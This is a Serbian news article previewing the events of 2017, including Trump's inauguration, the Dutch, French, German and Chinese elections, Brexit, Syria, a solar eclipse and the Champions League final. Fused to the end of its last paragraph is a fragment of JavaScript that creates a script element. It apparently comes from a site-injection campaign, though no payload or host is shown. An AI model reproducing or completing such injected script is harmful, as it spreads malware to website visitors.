SVET U 2017: Trampokratija i izbori koji određuju sudbinu Evrope

SVET U 2017: Trampokratija i izbori koji određuju sudbinu Evrope


Nećemo dugo čekati na događaj godine, bez premca. Pred zgradom Kongresa SAD, Donald Tramp stupiće na dužnost 20. januara i predsedničkom limuzinom odvešće se u Belu kuću, u kojoj će živeti i raditi naredne četiri godine.

Čitav svet politike i ekonomije očekuje poteze ovog milijardera, populiste i, po mnogima, i dalje neprihvatljivog za dužnost najmoćnijeg političara na planeti. I dalje je mnogo više pitanja nego odgovora kako će od 20. januara izgledati američka politika, posebno spoljna. Hoće li raskinuti nuklearni dogovor s Iranom? Hoće li SAD napustiti Pariski ugovor o klimatskim promenama, hoće li podići zid na granici s Meksikom, da li će uslediti otopljavanje s Rusijom, a zahlađenje s Kinom… Hoće li, na kraju, pokrenuti izmenu američkog izbornog sistema, zbog čijih je falinki celog života tražio njegovu promenu, sve dok se sam od njih nije okoristio?

Izbori (1)

Hronološki najbliži, prvi u seriji tri važna izborna ciklusa u Evropi, parlamentarni izbori u Holandiji zakazani su za 15. mart. Sve oči uprte su u rezultat krajnjeg desničara Gerta Vildersa, koji zagovara izlazak Holandije iz EU. Hoćemo li posle Bregzita dobiti Negzit tokom 2017, zavisi od plasmana ovog političara, protivnika migranata i čoveka kome je suđeno za govor mržnje.

Izbori (2)

Slede predsednički izbori u Francuskoj (23. aprila), ali zebnje su slične kao u Holandiji. Hoće li Francuska krenuti stazom Britanije, možda i Holandije, zavisi od rezultata krajnje desničarke Marin le Pen, vođe Nacionalnog fronta. Istraživanja joj, ipak, ne daju šansu za pobedu, a za to bi trebalo da se pobrinu protivkandidati, pre svega Fransoa Fijon, lider konzervativaca i kandidat socijalista, koji će biti poznat nakon januarskih unutarstranačkih izbora.

Izbori (3)

Izborno evropsko finale igraće se u Nemačkoj, u ranu jesen. Na teren će ipak izaći i Angela Merkel i daju joj se dobre šanse. Ipak, na raspoloženje birača u Nemačkoj uticaće ishod dva, prethodno pomenuta izbora – u Holandiji i Francuskoj, ali i nedavni teroristički napad u Berlinu. Tri evropska giganta, Nemačka, Francuska i Holandija, pored toga što su među osnivačima EU, nose 56 odsto ekonomije evrozone i otuda su očekivanja od izbora u tim zemljama tesno povezana s perspektivom same Unije.

Izbori (4)

Bez zapadnjačke buke i kampanje, ali nimalo manje važni, u novembru se u Kini održavaju izbori za članove Politbiroa Komunističke partije. Biće izabrana 24 člana Politbiroa i devet članova stalnog komiteta i zameniće dosadašnje, koji odlaze u penziju. Predsednik Kine Si Đinping, izgleda, ostaće i ubuduće prvi čovek zemlje i partije, ali iščekuje se da li će na novembarskoj sednici Nacionalnog kongresa, po tradiciji, biti imenovan njegov politički naslednik.
Bregzit 2.0
Referendumska odluka o izlasku Britanije iz EU ostaće svakako među glavnim evropskim i svetskim temama i u 2017. godini, bez obzira na to da li će premijerka Tereza Mej aktivirati procedure za razdruživanje.

Sirijska enigma

Nema nagoveštaja da li će Sirijom zavladati mir u 2017. godini, ali nema sumnje da će ova zemlja ostati u centru svetske pažnje. Odnosi velikih sila i njihovi interesi duboko se prepliću u ovoj ratom izmučenoj zemlji, a izlazak iz međunarodne pat-pozicije mnogi očekuju i s dolaskom nove američke administracije.

Totalno pomračenje

Svemirski spektakl, totalno pomračenje Sunca, koje smo imali priliku da posmatramo 1999. godine, moći će 21. avgusta da posmatraju svi oni koji se budu zadesili u nekoliko centralnih država SAD. Ako propustite ovu šansu, sledeća će se ukazati tek 2028. godine u Australiji.

Srećan rođendan

Kanski filmski festival, najpoznatiji u svetu, proslaviće ove godine 70. rođendan. Treba očekivati nešto specijalno na Rivijeri od 17. do 28. maja, mnogo “specijalnije” nego bilo koje obične godine.

Neutralni Vels

Prvi put će finale fudbalske Lige šampiona biti odigrano u Velsu. Na impozantnom stadionu Milenijum u Kardifu, u junu. Posebna poslastica je to što će se finale igrati, praktično, na neutralnom terenu, jer među dve najbolje ekipe u Evropi neće biti velškog tima. Navijači u Španiji, Nemačkoj, Italiji i Engleskoj priželjkuju da nabave ulaznice za ovaj spektakl, a da pre toga njihovi ljubimci ipak obezbede šansu da igraju u finalu.var d=document;var s=d.createElement(‘script’);

+ Trenutno nema komentara

Dodajte komentar